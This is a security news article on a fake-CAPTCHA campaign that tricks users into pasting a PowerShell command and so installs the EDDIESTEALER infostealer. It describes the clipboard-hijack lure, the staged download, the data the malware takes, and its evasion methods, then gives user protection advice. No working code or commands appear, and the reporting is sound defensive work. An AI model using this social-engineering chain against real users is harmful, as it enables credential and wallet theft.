In a recent development, cybersecurity experts have identified a sophisticated malware campaign that utilizes deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer named EDDIESTEALER. This campaign signifies a notable advancement in social engineering tactics, as attackers exploit users’ trust in standard security verification processes to execute malicious code.
Attack Methodology
The attack initiates when users visit compromised websites that display convincing fake I’m not a robot verification screens. These screens instruct users to perform a series of actions:
1. Press the Windows Key + R to open the Run dialog box.
2. Press Ctrl + V to paste clipboard contents.
3. Press Enter to execute the command.
Unbeknownst to the user, the malicious JavaScript has already copied a PowerShell command to their clipboard using the `document.execCommand(copy)` method. This command, when executed, initiates the download and execution of the EDDIESTEALER malware.
Technical Analysis
Elastic Security Labs analysts have observed that the campaign employs obfuscated React-based JavaScript payloads to present users with what appears to be legitimate Google reCAPTCHA verification interfaces. The PowerShell command executed by the user retrieves a JavaScript file named gverify.js from attacker-controlled domains, which subsequently downloads the main EDDIESTEALER executable with a pseudorandomly generated 12-character filename. This multi-layered approach effectively conceals the true nature of the attack while maintaining the appearance of legitimate system verification processes.
Data Theft Capabilities
EDDIESTEALER is designed to harvest a wide range of sensitive data, including:
– Credentials stored in browsers.
– Cryptocurrency wallet information.
– Password manager databases.
– FTP client configurations.
– Messaging application data.
The malware employs techniques similar to ChromeKatz to bypass application-bound encryption protections introduced in recent versions of Chrome, demonstrating its adaptability to modern browser security measures.
Evasion and Persistence Mechanisms
EDDIESTEALER utilizes multiple layers of obfuscation and evasion techniques, including:
– String Encryption: Extensive use of XOR ciphers with distinct key derivation functions, complicating static analysis efforts.
– API Obfuscation: A custom Windows API lookup mechanism that dynamically resolves function addresses, avoiding standard import tables.
These sophisticated techniques highlight the persistent threat posed by well-resourced cybercriminal organizations.
Recommendations for Users
To protect against such threats, users are advised to:
– Be Cautious with CAPTCHAs: Legitimate CAPTCHAs do not require users to execute system commands. If prompted to perform actions like opening the Run dialog box and pasting commands, do not proceed.
– Verify Website Authenticity: Ensure that the website requesting CAPTCHA verification is legitimate and trusted.
– Keep Software Updated: Regularly update operating systems, browsers, and security software to protect against known vulnerabilities.
– Use Security Solutions: Employ reputable antivirus and anti-malware solutions that can detect and prevent such threats.
By remaining vigilant and following these recommendations, users can significantly reduce the risk of falling victim to such sophisticated malware campaigns.
